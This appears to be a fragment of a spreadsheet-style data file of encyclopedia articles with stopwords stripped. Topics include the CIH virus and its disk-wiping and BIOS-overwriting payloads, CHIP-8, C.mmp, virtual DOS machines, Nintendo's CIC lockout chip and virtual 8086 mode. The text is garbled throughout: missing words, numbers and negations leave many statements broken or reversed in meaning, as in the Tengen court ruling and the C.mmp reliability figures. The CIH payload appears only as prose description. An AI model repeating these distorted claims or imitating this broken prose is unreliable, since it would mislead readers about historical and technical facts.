win16-based operating systems windows below. infects portable executable files splitting bulk code small slivers inserted inter-section gaps commonly seen files, writing small re-assembly routine table code segments' locations unused space tail header. this earned another name, "spacefiller". size virus around kilobyte, novel multiple-cavity infection method, infected files grow all. uses methods jumping processor ring hook system calls. payload, considered extremely dangerous, first involves virus overwriting first megabyte (1024kb) hard drive zeroes, beginning sector this deletes contents partition table, cause machine hang blue screen death. second payload tries write flash bios. bioses successfully written virus critical boot-time code replaced junk. this routine works machines. much emphasis machines motherboards based intel 430tx chipset, important variable cih's success writing machine's bios type flash chip machine. different flash chips chip families) different write-enable routines specific chips. makes attempt test flash type victim machines, write-enable sequence. first payload, information virus overwritten zeros lost. first partition fat32, gigabyte, overwritten mbr, partition table, boot sector first partition first copy first partition. boot sector simply replaced copies standard versions, partition table rebuilt scanning entire drive first copy restored second copy. this means complete recovery loss user data performed automatically tool like cih. first partition fat32 smaller bulk user data partition still intact without root directory difficult find especially significant fragmentation. second payload executes successfully, computer start all. reprogramming replacement flash bios chip required, systems affect predate bios restoration features. variants also comparison computer viruses timeline computer viruses worms references external links f-secure database f-secure technical page symantec technical page news article jennifer lopez e-mail fix-cih site steve gibson repair damage source code</t>
  </si>
  <si>
    <t>CHIP-8</t>
  </si>
  <si>
    <t>chip-8 interpreted programming language, developed joseph weisbecker. initially used cosmac telmac 1800 8-bit microcomputers mid-1970s. chip-8 programs chip-8 virtual machine. made allow video games easily programmed computers. simplicity chip-8, long history popularity, ensured chip-8 emulators programs still made day. roughly fifteen years chip-8 introduced, derived interpreters appeared models graphing calculators (from late 1980s onward, handheld devices many ways computing power mid-1970s microcomputers hobbyists). active community users developers existed late 1970s, beginning aresco's "viper" newsletter whose first three issues revealed machine code behind chip-8 interpreter. chip-8 applications there number classic video games ported chip-8, pong, space invaders, tetris, pac-man. there also applications like random maze generator conway's game life. chip-8 extensions variations during 1970s 1980s, chip-8 users shared chip-8 programs, also changes extensions chip-8 interpreter, cosmac users' newsletter, viper magazine. these extensions included chip-10 hi-res chip-8, introduced higher resolution standard 64x32, chip-8c chip-8x, extended monochrome display capabilities support limited color, among features. these extensions mostly backwards compatible, based original interpreter, although repurposed rarely used opcodes instructions.in 1979, electronics australia series articles building computer similar cosmac vip, based motorola 6800 architecture. this computer, dream 6800, came version chip-8. newsletter similar viper, called dreamer, used share chip-8 games interpreter. 1981, electronics today international (eti) series articles building computer, eti-660, also similar (and used microprocessor). regular eti-660 general chip-8 columns 1985. 1990, chip-8 interpreter called chip-48 made hp-48 graphing calculators games could programmed easily. erik bryntse later created another interpreter based chip-48, called schip, s-chip super-chip. schip extended chip-8 language larger resolution several additional opcodes meant make programming easier. development chip-48 interpreter, chip-8 would well known today.david winter's emulator, disassembler, extended technical documentation popularized chip-8/schip many platforms. laid complete list undocumented opcodes features, distributed across many hobbyist forums. many emulators used works starting point. however, chip-48 subtly changed semantics opcodes, schip continued semantics addition changing opcodes. many online resources chip-8 propagate semantics, many modern chip-8 games backwards compatible original chip-8 interpreter cosmac vip, even specifically schip extensions. chip-8 today there chip-8 implementation almost every platform, well development tools. games still developed cataloged chip-8 today, addition older games resurfacing online digital archives.while chip-8 schip commonly implemented emulators, pure hardware implementation (written verilog language) also exists certain fpga boards. virtual machine description memory chip-8 commonly implemented systems, cosmac telmac 1800. these machines 4096 (0x1000) memory locations, bits byte) term chip-8 originated. however, chip-8 interpreter occupies first bytes memory space machines. reason, programs written original system begin memory location (0x200) access memory location (0x200). uppermost bytes (0xf00-0xfff) reserved display refresh, bytes (0xea0-0xeff) reserved call stack, internal use, variables. modern chip-8 implementations, interpreter running natively outside memory space, need avoid lower bytes memory (0x000-0x1ff), common store font data there. registers chip-8 8-bit data registers named register doubles flag instructions; thus, avoided. addition operation, carry flag, subtraction, borrow" flag. draw instruction upon pixel collision. address register, named bits wide used several opcodes involve memory operations. stack stack used store return addresses subroutines called. original 1802 version allocated bytes levels nesting; modern implementations usually more. timers chip-8 timers. they count hertz, reach delay timer: this timer intended used timing events games. value read. sound timer: this timer used sound effects. when value nonzero, beeping sound made. input input done keyboard keys ranging '8', '4', '6', keys typically used directional input. three opcodes used detect input. skips instruction specific pressed, another specific pressed. third waits press, stores data registers. graphics sound original chip-8 display resolution 64×32 pixels, color monochrome. graphics drawn screen solely drawing sprites, pixels wide pixels height. sprite pixels xor'd corresponding screen pixels. words, sprite pixels flip color corresponding screen pixel, unset sprite pixels nothing. carry flag (vf) screen pixels flipped unset sprite drawn otherwise. this used collision detection. previously described, beeping sound played value sound timer nonzero. opcode table chip-8 opcodes, bytes long stored big-endian. opcodes listed below, hexadecimal following symbols: nnn: address 8-bit constant 4-bit constant 4-bit register identifier program counter 16bit register (for memory address) (similar void pointer); available variables. (hexadecimal);there many implementations chip-8 instruction since 1978. following specification based super-chip specification 1991 (but without additional opcodes provide extended functionality), commonly encountered extension today. footnotes denote incompatibilities original chip-8 instruction 1978. notes references further reading "rca cosmac cdp18s711 instruction manual," solid state division, somerville, 08776, february 1978. part vip-311. 13–18, 35–37. byte magazine, december 1978, 108–122. easy programming system," joseph weisbecker. describes chip-8 specific example rocketship shooting-gallery game. archive chip8.com website dedicated chip-8 related systems. maintains complete collection chip-8 programs net. mastering chip-8, accurate reference original chip-8 instruction david winter's chip-8 emulator, utilities games. bytepusher minimalist virtual machine inspired chip-8. cosmac group yahoo, authorized scans viper magazine. ochip8 chip-8 emulator browser dream 6800 popular dream 6800 microcomputer featured electronics australia 1979 chip-8. fpga superchip verilog implementation schip specification. octo online chip-8 ide, development system, compiler/assembler emulator, proprietary scripting language cowgod's chip-8 technical reference (chip-48/schip) matt mikolay chip-8 extensions reference chip-8.com chip-8 classic computer manual</t>
  </si>
  <si>
    <t>C.mmp</t>
  </si>
  <si>
    <t>c.mmp early multiple instruction, multiple data (mimd) multiprocessor system developed carnegie mellon university (cmu) william wulf (1971). notation c.mmp came notation gordon bell allen newell, central processing unit (cpu) designated variant noted notation, stood multi-mini-processor. 2020, machine display cmu, wean hall, ninth floor. structure sixteen digital equipment corporation pdp-11 minicomputers used processing elements, named compute modules (cms) system. each local memory local peripheral devices. challenges device available unique connected processor, input/output (i/o) system (designed levien) connectivity devices routed requests hosting processor. processor went down, devices connected unibus became unavailable, became problem overall system reliability. processor (the boot processor) disk drives attached. each compute modules shared communication pathways: interprocessor used distribute system-wide clock, interrupt, process control messaging among 16x16 crossbar switch used connect side banks shared memory other. processors accessing different banks memory, memory accesses would concurrent. processors trying access bank memory, would granted access cycle remainder would negotiated subsequent memory cycles.since pdp-11 logical address space 16-bits, another address translation unit added expand address space bits shared memory space. unibus architecture provided bits physical address, high-order bits used select four relocation registers selected bank memory. properly managing registers challenges programming operating system (os) kernel. original c.mmp design used magnetic-core memory, lifetime, higher performance dynamic random-access memory (ram) became available system upgraded. original processors pdp-11/20 processors, final system, five used; remaining pdp-11/40 processors, modified extra writeable microcode space. modifications machines designed built cmu. most 11/20 modifications custom changes wire-wrapped backplane, pdp-11/40 implemented microcode, separate proc-mod board designed intercepted certain instructions implemented protected operating system requirements. example, necessary, operating system integrity, stack pointer register never odd. 11/20, done clipping lead low-order stack register. 11/40, access stack intercepted proc-mod board generated illegal data access trap low-order operating system operating system (os) named hydra. capability-based, object-oriented, multi-user, microkernel. system resources represented objects protected capabilities. application software written programming language bliss-11, required cross-compiling pdp-10. used little assembly language. among programming languages available system algol variant included extensions supporting parallel computing, make good c.mmp. algol compiler native hydra reliability because overall system reliability depended cpus running, serious problems overall hardware reliability. mean time failures (mtbf) processor hours, overall system reliability 16/24 hours, minutes. overall, system usually hours. many failures timing glitches many custom circuits added processors. great effort expended improve hardware reliability, processor noticeably failing, partitioned out, would diagnostics several hours. when passed first diagnostics, partitioned back processor would application code (but peripheral devices available); continued diagnostics. passed several hours, reinstated full member processor set. similarly, block memory (one page) detected faulty, removed pool available pages, otherwise notified, would ignore page. thus, became early example fault-tolerant system, able deal hardware problems arose, inevitably. references wulf, bell, (1972). c.mmp: multi-mini-processor (pdf) (report). carnegie mellon university (cmu). bell, broadley, wulf, newell, pierson, (1971). c.mmp: multiminiprocessor computer: requirements overview initial design (pdf) (report). carnegie mellon university (cmu). wulf, harbison, (2000). "reflections pool processors: experience report c.mmp/hydra". readings computer architecture. gulf professional publishing. 561–573. isbn 9781558605398. wulf, harbison, samuel iii; levin, january 1981). hydra/c.mmp: experimental computer system. mcgraw-hill. isbn 978-0070721203.)</t>
  </si>
  <si>
    <t>Virtual Machine Manager</t>
  </si>
  <si>
    <t>computing, virtual machine manager, also known virt-manager, desktop virtual machine monitor. features virtual machine manager allows users create, edit, start stop view control vm's console performance utilization statistics view running hosts, live performance resource utilization statistics. kvm, qemu virtual machines, running either locally remotely. containerssupport freebsd's bhyve hypervisor included since 2014, though remains disabled default. distributions including virtual machine manager virtual machine manager comes virt-manager package arch linux centos debian (since lenny) fedora (since version freebsd (via ports collection) frugalware gentoo mandriva linux (since release 2007.1) mxlinux netbsd (via pkgsrc) openbsd (via ports collection) opensuse (since release 10.3) enterprise linux (versions only) scientific linux trisquel trueos ubuntu (version 8.04 above) void linux also libvirt, used virtual machine manager create manage virtual machines references external links official website documentation while virtual machine manager project lacks documentation, third parties providing relevant information, e.g.: enterprise linux virtualization documentation (vmm used rhel later): getting started virtual machine manager fedora documentation: getting started virtualization ubuntu official documentation: kvm/virtmanager libvirt documentation: documentation: index documentation: storage pools documentation: network management architecture wiki: virtual networking</t>
  </si>
  <si>
    <t>Virtual Machine Communication Facility</t>
  </si>
  <si>
    <t>virtual machine communication facility (vmcf) feature vm/370 operating system introduced release 1976. "provides method communication data transfer virtual machines operating vm/370 system."vmcf uses paravirtualization diagnose instruction vmcf send function send data, blocks 2048 bytes, virtual machine another. receiving virtual machine accesses data thru diagnose receive function. provides simpler interface greater performance prior virtual channel-to-channel adapters purpose. references also inter user communication vehicle</t>
  </si>
  <si>
    <t>CAINE Linux</t>
  </si>
  <si>
    <t>caine linux (computer aided investigative environment) italian linux live distribution managed giovanni "nanni" bassetti. project began 2008 environment foster digital forensics incidence response (dfir), several related tools pre-installed. purpose caine professional open source forensic platform integrates software tools modules along powerful scripts graphical interface environment. operational environment designed intent provide forensic professional tools required perform digital forensic investigate process (preservation, collection, examination analysis). caine live linux distribution booted removable media (flash drive) optical disk memory. also installed onto physical virtual system. live mode, caine operate data storage objects without boot supporting operating system. latest version 11.0 boot uefi/uefi+secure legacy bios allowing caine used information systems boot older operating systems (e.g. windows newer platforms (linux, windows 10). requirements caine based ubuntu 18.04 64-bit, using linux kernel 5.0.0-32. caine system requirements live disc similar ubuntu 18.04. physical system virtual machine environment vmware workstation. supported platforms caine linux distribution numerous software applications, scripts libraries used graphical command line environment perform forensic tasks. caine perform data analysis data objects created microsoft windows, linux unix systems. forensic features since version sets block devices default read-only mode. write-blocking critical methodology ensure disks subject writing operations operating system forensic tools. this ensures attached data objects modified, would negatively impact digital forensic preservation. tools caine provides software tools support database, memory, forensic network analysis. file system image analysis ntfs, fat/exfat, ext2, ext3, 9660 possible command line graphic desktop. examination linux, microsoft windows unix platforms built-in. caine import disk images (dd) expert witness/advanced file format. these obtained using tools included caine another platform encase forensic tool kit.some tools included caine linux distribution include: sleuth open source command line tools support forensic inspection disk volume file system analysis. autopsy open source digital forensics platform supports forensic analysis files, hash filtering, keyword search, email artifacts. autopsy graphical interface sleuth kit. regripper open source tool, written perl, extracts/parses information (keys, values, data) registry database data analysis. tinfoleak open source tool collecting detailed twitter intelligence analysis. wireshark supports interactive collection network traffic real-time analysis data packet captures (*.pcap). photorec supports recovery lost files hard disk, digital camera optical media. fsstat displays file system statistical information image storage object. references external links official website</t>
  </si>
  <si>
    <t>Virtual Link Trunking</t>
  </si>
  <si>
    <t>virtual link trunking (vlt) name used least proprietary network protocols. link aggregation protocol developed force10 early vlan tagging capability 3com. force10 virtual link trunking proprietary aggregation protocol developed force10 (now dell networking) available datacenter-class enterprise-class network switches. implemented latest firmware releases legacy (ftos) high-end switches like e-series 10/25,40 gbit/s datacenter switches. also implemented current os10 smart fabric although proprietary protocol dell networking (formerly force10) vendors offer similar features allow users aggregated link towards (logical) different switches, standard aggregated link terminate single logical switch (thus either single physical switch different members stacked switch setup) like cisco mlag. latest dell supported onie based powerswitch devices, sonic, also offers similar protocol mlag layer-2 link aggregation protocol end-devices (servers) connected (different) access-switches, offering servers redundant, load-balancing connection core-network loop-free environment, eliminating requirement spanning-tree protocol. where existing link aggregation protocols like (static) (ieee 802.3ad) lacp (ieee 802.1ax) require different (physical) links connected (logical) switch (such stacked switches), vlt, example, allows link connectivity server network different switches. instead using end-devices like servers also used uplinks (access/distribution) switches core switches.a major complication existing link aggregation bonding technologies members interfaces team/group need terminate single logical switch. beside increasing bandwidth another reason link aggregation redundancy. make possible connect different physical switches combine physical switch logical switch using switch stacking techniques different physical boxes seen logical switch management (spanning-tree) topology. switches running stacked configuration always firmware, means case firmware upgrade network manager implement firmware stack-members time, resulting outage entire stack. alternative different logical switches, used links blocked ensure loop-free topology (which partially overcome using multiple spanning tree cisco's proprietary vlan spanning tree. spanning tree protocol relatively slow convergence, result periods traffic can't forwarded network thus leads outages applications. address issues, making possible create loop free redundant network topology without using spanning tree protocol. example configuration works found blog geslinux written grzegorz witkowski 3com prior supporting standardized ieee 802.1q tagging, 3com used proprietary virtual trunking (vlt). 3com supported vlan 1–16 reserved autoselect vlan mode (where vlan server decides port membership) reserved spanning tree protocol. also ieee 802.1aq (shortest path bridging) multi-chassis link aggregation group trill (transparent interconnection lots links) virtual portchannel cisco (nexus) dell networking (dnos6.x) proprietary implementations mc-lag references</t>
  </si>
  <si>
    <t>CAP computer</t>
  </si>
  <si>
    <t>cambridge computer first successful experimental computer demonstrated security capabilities, hardware software. developed university cambridge computer laboratory 1970s. unlike research machines time, also useful service machine.the sign currently front machine reads: project memory protection 1970 1977. based capabilities implemented hardware, wilkes needham wheeler responsible implementation. needham awarded technical award 1978 (capability protection) project. design designed access memory segment hardware required current process held necessary capabilities. 32-bit processor featured microprogramming control, 256-entry caches, 32-entry write buffer capability unit itself, registers holding evaluated capabilities. floating point operations available using single 72-bit accumulator. instruction featured instructions, including basic memory operations, capability- process-control instructions. instead programmer-visible registers used chicago plessey system designs, would load internal registers silently program defined capability. memory divided segments 32-bit words. each segment could contain data capabilities, both. hardware accessed associated minicomputer. procedures constituting operating system written algol 68c, although number closely associated protected procedures paginator written bcpl. operation first became operational 1976. fully functional computer, featured complete operating system, file system, compilers, used process tree structure, initial process called "master coordinator". this removed need separate modes operation, process could directly access resources children. practice, levels ever used cap's operation.in 1981 macro spitbol version snobol4 programming language implemented nicholas brown. also plessey system system/38 c.mmp rsre flex notes references wilkes, needham, (1979). cambridge computer operating system (pdf). york: elsevier north holland. levy, henry (1984). "the cambridge computer". capability-based computer systems (pdf). digital press.</t>
  </si>
  <si>
    <t>CAPICOM</t>
  </si>
  <si>
    <t>capicom discontinued activex control created microsoft help expose select microsoft cryptographic application programming interface (cryptoapi) functions microsoft component object model (com). intended enable every environment supports activex microsoft cryptographic technologies, including pages opened microsoft internet explorer browser supports activex.capicom used digitally sign data, inspect, verify display digital signature digital certificate, remove certificates certificate stores, finally, encrypt decrypt data.capicom version 2.1.0.3, latest last version capicom, officially supported windows vista. however, microsoft announced capicom discontinued longer developed. microsoft suggests replacing capicom .net framework's x509 cryptographic classes number alternatives.capicom included windows linked microsoft article goes detail. references</t>
  </si>
  <si>
    <t>Virtual Iron</t>
  </si>
  <si>
    <t>virtual iron software, located lowell, massachusetts, sold proprietary software virtualization management virtual infrastructure. co-founded alex vasilevsky, virtual iron figured among first companies offer virtualization software fully support intel vt-x amd-v hardware-assisted virtualization.as 2009 oracle corporation agreed acquire virtual iron software, inc., subject customary closing conditions. oracle declines offer updates patches current customers, even updates patches developed purchase. june 2009, register reported oracle killed virtual iron product. virtual iron platform virtual iron software unmodified 32-bit 64-bit guest operating systems near-native performance. virtualization manager offered access control, automate, modify monitor virtual resources. virtualization services automatically deployed supported hardware without additional software. platform based open source hypervisor. virtual iron, like virtualization software, provided server consolidation, business continuity capacity management.the virtual iron platform consisted virtualization manager, virtualization servers hypervisor. virtualization manager (vi-center), java-based application, allowed central management virtualized servers. physical server could many virtualized servers, unmodified guest operating systems. virtual iron could physical-storage virtual-storage access models. however, virtual-storage access model leveraged storage create fault-tolerant iscsi fibre channel based cluster virtual nodes. center installed windows linux. after installation, administrator configure "management network" purpose communicating nodes cluster. center used management network boot server connected correctly configured (for boot). included liverecovery tool could configure high availability. additionally, power-consumption load-balancing configurable using livecapacity livepower tools respectively. additional features included disk virtual machine cloning (snapshots), ipmi/ilo support, etc. "native virtualization" virtual iron implemented full virtualization (requiring hardware-assisted virtualization called native virtualization) paravirtualization. native virtualization allowed unmodified guest operating systems advantage hardware advances better performance. virtual iron, claimed pioneered implementation native virtualization. virtual iron discussed paravirtualization native virtualization blog: virtual iron decided paravirtualization favor "native virtualization." with hardware advances coming intel amd, native virtualization capable matching physical hardware performance without complexity engineering efforts involved paravirtualizing from discussions broad range users, simply want roll modified unless trade-off heavily favor. this faustian trade-off longer necessary. also comparison platform virtualization software virtual machine platform virtualization virtualization references external links virtual iron home page virtual iron virtualization news support training resources</t>
  </si>
  <si>
    <t>CAST-256</t>
  </si>
  <si>
    <t>cryptography, cast-256 cast6) symmetric-key block cipher published june 1998. submitted candidate advanced encryption standard (aes); however, among five finalists. extension earlier cipher, cast-128; designed according "cast" design methodology invented carlisle adams stafford tavares. howard heys michael wiener also contributed design. cast-256 uses elements cast-128, including s-boxes, adapted block size bits twice size 64-bit predecessor. similar construction occurred evolution rc6). acceptable sizes 128, 160, 192, bits. cast-256 composed rounds, sometimes described "quad-rounds", arranged generalized feistel network. 2612, authors state that, "the cast-256 cipher described document available worldwide royalty-free licence-free basis commercial non-commercial uses." currently, best public cryptanalysis cast-256 standard single secret setting works keys zero-correlation cryptanalysis breaking rounds 2246.9 time 298.8 data. also process references external links cast-256 john savard 256bit ciphers cast256 reference implementation derived code standard cryptographic algorithm naming: cast-256 2612</t>
  </si>
  <si>
    <t>Virtual DOS machine</t>
  </si>
  <si>
    <t>virtual machines (vdm) refer technology allows running 16-bit/32-bit 16-bit windows programs already another operating system running controlling hardware, userland originated earlier versions windows included windows overview virtual machines operate either exclusively typical software emulation methods (e.g. dynamic recompilation) rely virtual 8086 mode intel 80386 processor, allows real mode 8086 software controlled environment catching operations involve accessing protected hardware forwarding normal operating system exceptions). operating system perform emulation resume execution software. vdms generally also implement support running 32-bit protected mode software (dos extenders), conform protected mode interface (dpmi).when program running inside needs access peripheral, windows either allow directly (rarely), present program virtual device driver (vdd) emulates hardware using operating system functions. systematically emulations intel 8259a interrupt controllers, 8254 timer chips, 8237 controller, etc. concurrent 8086 emulation mode january 1985 digital research together intel previewed concurrent 1.0, version concurrent capable running real mode programs 80286's protected mode. method devised stepping processor chips, however, 1985 stopped working subsequent processor steppings shortly digital research release product. although stepping intel started address issues august 1985, digital research's "8086 emulation mode" worked utilizing undocumented loadall processor instruction, slow practical. microcode changes stepping improved speed again. this early implementation seen predecessor actual virtual machines. eventually, concurrent reworked potential desktop operating system become flexos industrial 1986. also licensed 4680 1986.when intel's 80386 virtual 8086 mode became available samples since october 1985 quantities since june 1986), digital research switched real mode programs virtual machines protected mode concurrent (february 1987) flexos (june 1987). however, architecture multiuser multitasking protected mode operating systems dos-based themselves. concurrent later developed become multiuser (since 1991) real/32 (since 1995). flexos later became 4690 1993. dos-based vdms contrast protected mode operating systems, dos, default, real-mode operating system, switching protected mode virtual mode behalf memory managers extenders order provide access extended memory memory first megabyte, accessible normal programs. dos-based vdms appeared microsoft's windows/386 2.01 september 1987. dos-based virtual machines also present windows 3.0, 3.1x windows workgroups 3.1x running enhanced mode well windows characteristics solutions running memory layout shown inside virtual machines virtual instances system driver configuration multitasker loaded, requests cannot handled protected mode passed system domain executed underlying system. similar windows enhanced mode architecture, emm386 3.xx novell caldera opendos 7.01, dr-dos 7.02 (and later) also uses dos-based vdms support pre-emptive multitasking multiple applications, emm386 /multi option used. this component development digital research novell since 1991 codename "vladivar" (originally separate device driver krnl386.sys instead module emm386). while primarily developed next major version dos, released novell 1994, also used never released "panther" "star trek" project 1992/1993. os/2 mvdm vdms called mvdm (multiple virtual machine) used os/2 later since 1992. os/2 mvdms considerably powerful ntvdm. example, block devices supported, various versions booted os/2 mvdm. while os/2 based 3.0, os/2 mvdms emulate 5.0.seamless integration windows later win32s applications os/2 concept looking similar surface seamless integration mode based windows virtual windows redirector "guest" ntvdm allows access disks os/2 "host". applications "guest" named pipes communication "host".due technical limitation, 16-bit windows applications os/2 unable hard drive space, fixed arcaos 5.0.4. windows ntvdm ntvdm system component ia-32 editions windows family 1993 release windows 2015 final appearance windows allows execution 16-bit windows 16-bit 32-bit applications. included 64-bit versions arm32 based versions windows windows core. windows 32-bit user-mode executable forms basis single windows 3.x) environment called ntvdm.exe.in order execute programs, ntvdm loads ntio.sys turn loads ntdos.sys, executes modified command.com order application passed ntvdm command-line argument. 16-bit real-mode system files stripped derivations ms-dos equivalents io.sys, msdos.sys command.com hard-wired assumptions file system removed using invalid opcode 0xc4 0xc4 32-bit ntvdm handle requests. originally, ntdos reported version 30.00 programs, soon changed report version 5.00 21h/ah=30h 5.50 21h/ax=3306h allow programs unmodified. this holds true even newest releases windows; many additional ms-dos functions commands introduced ms-dos versions windows missing. 16-bit windows applications default thread within single ntvdm process. although ntvdm 32-bit process pre-emptively multitasked respect rest system, 16-bit applications within cooperatively multitasked respect other. when "run separate memory space" option checked application's shortcut file, 16-bit windows application gets ntvdm process therefore pre-emptively multitasked respect processes, including 16-bit windows applications. ntvdm emulates bios calls tables well windows kernel 16-bit stubs. 32-bit translation layer thunks 16-bit routines. 32-bit emulation present protected mode interface (dpmi) 32-bit memory access. this layer converts necessary extended expanded memory calls functions windows memory calls. wowexec.exe emulation layer emulates 16-bit windows. windows 2000 windows added sound blaster emulation. 16-bit virtual device drivers block device drivers (e.g., disks) supported. inter-process communication subsystems take place ole, named pipes. since virtual 8086 mode available non-x86-based processors (more specifically, mips, alpha, powerpc) ntvdm instead implemented full emulator versions using code licensed insignia's softpc. windows 3.51, 80286 emulation available. with windows 4.0, emulation added.with windows dropping support 32-bit ia-32 processors, ntvdm component discontinued. commands following list commands part windows ms-dos subsystem. security issue january 2010, google security researcher tavis ormandy revealed serious security flaw windows nt's implementation allowed unprivileged users escalate privileges system level, noted applicable security versions windows kernel since 1993. this included 32-bit versions windows 2000, server 2003, vista, server 2008, windows ormandy published proof-of-concept exploit vulnerability. prior microsoft's release security patch, workaround issue turn 16-bit application support, prevented older programs (those written windows 3.1) running. 64-bit versions windows affected since ntvdm subsystem installed default. once microsoft security patches applied affected operating systems could safely reenabled. limitations limitation exists windows 16-bit subsystem (but earlier versions windows raised per-session limit objects causes handles shifted right bits, converting bits. result, actual handle cannot larger bits consequently 16-bit applications happen served handle larger 16384 system crash terminate error message.in x86-64 cpu, virtual 8086 mode available sub-mode legacy mode (for running 32-bit operating systems), native 64-bit long mode.the ntvdm supported x86-64 editions windows, including programs, ntvdm uses vm86 mode instead local descriptor table order enable 16‑bits segment required addressing aarch64 microsoft release full emulator incompatible instruction like previous incompatible architecture. however, still using virtualization software, like windows mode windows vmware workstation, installing ntvdmx64, unofficial port older emulated implementation ntvdm provided non-x86 platforms. another option otvdm (winevdm), 16-bit windows interpreter based mame's i386 emulation 16-bit part popular windows compatibility layer wine.in general, similar technologies satisfactorily older games today's computers. emulation provided basic peripherals, often implemented incompletely. example, sound emulation ntvdm limited. nt-family versions windows update real screen times second program writes emulate higher resolution graphics modes. because software mostly runs native speed host cpu, timing loops expire prematurely. this either makes game much fast causes software even notice emulated hardware peripherals, wait long enough answer. also comparison platform virtualization software desqview (since 1988) wine (software) dosbox dosemu merge (software) list microsoft windows components hypervisor windows windows (wow) virtual machine (vm) notes references further reading pietrek, matt (august 1998). "under hood". microsoft systems journal. archived original 2017-07-13. retrieved 2020-01-22 bytepointer.com. external links virtual machine structure troubleshooting ms-dos-based programs windows troubleshooting ms-dos application hangs ntvdm subsystem windows windows server 2003 troubleshooting ms-dos-based serial communication programs windows 2000 later ms-dos player win32-x64, microsoft ms-dos emulator, runs many command line programs like compilers tools, also packaged stand-alone executable file. vdos, emulator designed running "serious" apps (not games) 64-bit systems (effectively replacement ntvdm modern systems).</t>
  </si>
  <si>
    <t>CIC (Nintendo)</t>
  </si>
  <si>
    <t>checking integrated circuit (cic) lockout chip designed nintendo nintendo entertainment system (nes) video game console 1985; chip part system known 10nes, 'key' (which stored game) used 'lock' (stored console) check game authentic, game region console. chip designed response north american video game crash 1983, partially result lack publishing quality control; idea forcing third-party developers games approval process, nintendo could stop shovelware entering market. improved designs chip also used later super nintendo entertainment system nintendo although running updated security program performs additional checks. lockout chip controversial, several developers opting release games without nintendo's approval using work-arounds; well-known tengen subsidiary atari), copied chip, resulting games running without issue. nintendo would soon atari copyright infringement. 10nes 10nes system lock-out system designed north american european versions nintendo entertainment system (nes) video game console. electronic chip serves digital lock opened games, designed restrict software could operated system.the chip present originally original famicom 1983, leading large amount unlicensed cartridges asian market. they were, however, added international variants response 1983 video game crash north america, partially caused oversaturated market console games lack publishing control. nintendo president hiroshi yamauchi said 1986, "atari collapsed gave much freedom third-party developers market swamped rubbish games." requiring presence 10nes game cartridge, nintendo prevented third-party developers producing games without nintendo's approval, provided company licensing fees, practice already established earlier famicom games. design system consists parts, sharp corporation 4-bit sm590 microcontroller console (the "lock") checks inserted cartridge authentication, matching chip game cartridge (the "key") gives code upon demand. cartridge successfully provide authentication, repeatedly resets frequency this causes television power blink rate prevents game playable. program used called 10nes patented u.s. patent 4,799,635. source code copyrighted; nintendo produce authorization chips. patent covering 10nes expired january 2006, although copyright still effect exact clones. circumvention nintendo entertainment system some unlicensed companies created circuits used voltage spike shut perform authentication checks.: unlicensed games released europe australia (such games) came form dongle would connected licensed cartridge, order cartridge's lockout chip authentication. this method also worked snes utilized super noah's ark.tengen (atari’s games subsidiary) took different tactic: corporation obtained description code lockout chip united states copyright office claiming required defend present infringement claims legal case. tengen used documents design rabbit chip, duplicated function 10nes. nintendo sued tengen actions. court found tengen violate copyright copying portion code necessary defeat protection current consoles, violate copyright copying portions code used communication chip console. tengen copied code entirety future console releases could engineered pick discrepancy. initial claim, court sided nintendo issue patent infringement, noted nintendo's patent would likely deemed obvious basically u.s. patent 4,736,419 addition reset pin, time already commonplace world electronics. eight-person jury later found atari infringe. while nintendo winner initial trial, could actually enforce ruling would need patent hold scrutiny, well address tengen's antitrust claims. before occurred, sides settled.a small company called retrozone, first company publish games decade, uses multi-region lockout chip ntsc, called ciclone created reverse engineering tengen's rabbit chip. allow games played region. intended make games playable older hardware uses 10nes lockout chip regions, although top-loading lockout chip. ciclone chip first lockout chip developed patent 10nes expired. since then, open source implementations allow general public reproduce multi-region cics microcontrollers.because 10nes model nes-001 control deck occasionally fails authenticate legal cartridges, common modification disable chip entirely cutting control deck's internal 10nes lockout chip. super nintendo entertainment system towards snes lifespan, cloned used pirate games. often, clone chip would rebranded inconspicuous brand/part number prevent detection authorities. alternatively aforementioned method using licensed game's chip possible, used snes version super noah's ark. super famicom also regional lockout lockout chip references external links kevin horton. "the infamous lockout chip." accessed august 2010. logg (atari) interview" discussing tengen lock chip ciclone lockout chip information retrozone disabling "lockout chip 2009-04-29) (rev. 26-dec-97) source code compatible</t>
  </si>
  <si>
    <t>Virtual 8086 mode</t>
  </si>
  <si>
    <t>80386 microprocessor later, virtual 8086 mode (also called virtual real mode, v86-mode, vm86) allows execution real mode applications incapable running directly protected mode processor running protected mode operating system. hardware virtualization technique allowed multiple 8086 processors emulated chip. emerged painful experiences 80286 protected mode, suitable concurrent real-mode applications well. john crawford developed virtual mode register set, paving environment.vm86 mode uses segmentation scheme identical real mode (for compatibility reasons), creates 20-bit linear addresses manner 20-bit physical addresses created real mode, subject protected mode's memory paging mechanism. overview virtual 8086 mode mode protected-mode task. consequently, processor switch vm86 non-vm86 tasks, enabling multitasking legacy (dos) applications. virtual 8086 mode, operating system sets virtual 8086 mode monitor, program manages real-mode program emulates filters access system hardware software resources. monitor must privilege level protected mode. only 8086 program runs vm86 mode privilege level when real-mode program attempts things like access certain ports hardware devices access certain regions memory space, traps events calls monitor, examines real mode program trying either acts proxy interface hardware, emulates intended function real-mode program trying access, terminates real-mode program trying something cannot either allowed adequately supported (such reboot machine, video display mode supported hardware emulated, write operating system code). monitor also deny permission gently emulating failure requested operation—for example, make disk drive always appear ready fact even checked drive simply permit real-mode program access also, monitor things like memory pages, intercept calls interrupts, preempt real-mode program, allowing real-mode programs multitasked like protected-mode programs. intercepting hardware software real-mode program tracking state program expects, allow multiple programs share hardware without interfering other. mode provides real-mode programs designed single-tasking environment (like dos) concurrently multitasking environment. usage used execute certain programs flexos (since 1987), concurrent (since 1987), windows/386 2.10 (since 1987), desqview (since 1988), windows (since 1990), multiuser (since 1991), windows workgroups 3.1x (since 1992), os/2 (since 1992), 4690 (since 1993), real/32 (since 1995) running enhanced mode well windows virtual machines, unix merge, linux dosemu. (other programs protected mode execute using user mode emulator.) ntvdm windows nt-based operating systems also vm86 mode, limited direct hardware access. some boot loaders (e.g. grub) protected mode, execute bios interrupt calls virtual 8086 mode. memory addressing interrupts common problem running 8086 code protected mode memory addressing totally different protected mode real mode. mentioned, working vm86 mode segmentation mechanism reconfigured work like real mode, paging mechanism still active, transparent real mode code; thus, memory protection still applicable, isolation address space. when interrupts (hardware, software instruction) occur, processor switches vm86 mode returns work full protected mode handle interrupt. also, servicing interrupt, registers pushed stack zeroed. virtual-8086 mode extensions (vme) pentium architecture added number enhancements virtual 8086 mode. these however documented intel starting subsequent 